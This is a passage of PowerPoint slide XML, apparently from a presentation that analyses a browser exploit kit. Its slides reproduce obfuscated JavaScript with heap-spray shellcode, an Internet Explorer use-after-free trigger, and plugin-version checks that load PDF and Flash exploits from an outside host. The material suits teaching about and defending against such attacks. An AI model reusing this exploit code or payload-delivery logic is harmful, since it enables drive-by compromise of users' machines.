            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>JyxIaABZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>oKqMlPqL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>JyxIaABZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>pbIkPrKa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>JyxIaABZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>GBVpRAcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>eSSOLKOd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>CollectGarbage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>();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fseYOuUZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>TzsygYnD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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wxDSxsOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = new Array();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>for (</a:t>
            </a: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FNMszcqR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>FNMszcqR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>wSqaQK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>FNMszcqR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>++) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>wxDSxsOR.push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
              <a:t>"));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/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>FKOASMamskASDweqnbjdwasSDQWWQq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>vVLUmYRf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>tbody</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>vVLUmYRf.click</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a: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wycLwNIo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>vVLUmYRf.cloneNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>vVLUmYRf.clearAttributes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>vVLUmYRf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = null;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>CollectGarbage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>    for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>CKGlPoYs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>CKGlPoYs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>wxDSxsOR.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>CKGlPoYs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>++) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>wxDSxsOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>CKGlPoYs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>fseYOuUZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>wycLwNIo.click</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>window.setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>FKOASMamskASDweqnbjdwasSDQWWQq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>();', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>wSqaQK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>);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0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MuqEZYdx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"%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u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01…“ ;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avIztsbF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sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"%u0C0C%u0C0C"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TzsygYnD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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%u0b0b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%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA";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eSSOLKOd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sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unescape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MuqEZYdx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);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pbIkPrKa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new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Array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();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wSqaQK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1000;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xASdnqwj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0x100000;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xAFKNqwO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2;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oQkmsLLP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0x01020;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EibcUrHC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xASdnqwj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- (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eSSOLKOd.length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*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xAFKNqwO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+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oQkmsLLP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);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cTAfWBbz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sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unescape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avIztsbF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);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oKqMlPqL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0xC0;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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>while</a:t>
            </a:r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cTAfWBbz.length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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;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EibcUrHC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xAFKNqwO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) {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cTAfWBbz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+=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cTAfWBbz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}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GBVpRAcd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cTAfWBbz.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>substring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(0,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EibcUrHC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xAFKNqwO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);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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>delete</a:t>
            </a:r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cTAfWBbz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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JyxIaABZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JyxIaABZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>oKqMlPqL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JyxIaABZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>++) {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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pbIkPrKa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JyxIaABZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GBVpRAcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eSSOLKOd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;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FF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1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CollectGarbage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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fseYOuUZ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sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unescape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TzsygYnD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);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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wxDSxsOR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new Array();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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var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  <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FNMszcqR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FNMszcqR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wSqaQK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FNMszcqR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>++)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wxDSxsOR.push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document.createElement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("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img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"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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function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FKOASMamskASDweqnbjdwasSDQWWQq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() {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vVLUmYRf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document.createElement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("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tbody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");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vVLUmYRf.click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wycLwNIo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vVLUmYRf.cloneNode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();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vVLUmYRf.clearAttributes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();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vVLUmYRf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null;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CollectGarbage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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   for (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var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CKGlPoYs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0;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CKGlPoYs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&lt;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wxDSxsOR.length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;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CKGlPoYs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++)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wxDSxsOR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CKGlPoYs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].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src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fseYOuUZ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wycLwNIo.click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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window.setTimeout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('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FKOASMamskASDweqnbjdwasSDQWWQq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();',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wSqaQK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);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76200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zmn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = null;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>try {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zmn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("AcroPDF.PDF");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>} catch (e) {}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zmn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    try {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zmn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PDF.PdfCtrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    } catch (e) {}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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zmn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    lv = ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zmn.GetVersions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>().split(","))[4].split("="))[1].replace(/\./g, "");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    if ((lv &lt; 900) &amp;&amp; (lv != 813)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('&lt;embed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://articles.koraja.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>showcat.php?cid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=87&amp;cn=Music+%26+MP3?s=EYq5g7Cg&amp;id=2" width=100 height=100 type="application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;&lt;/embed&gt;');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/>
              <a:t>try {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zmn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0;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zmn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = (new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("ShockwaveFlash.ShockwaveFlash.9")).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetVariable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("$" + "version").split(",");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>} catch (e) {}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zmn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp;&amp; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zmn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[2] &lt; 124)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('&lt;object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=middle&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> name="movie" value="http://articles.koraja.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>showcat.php?cid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
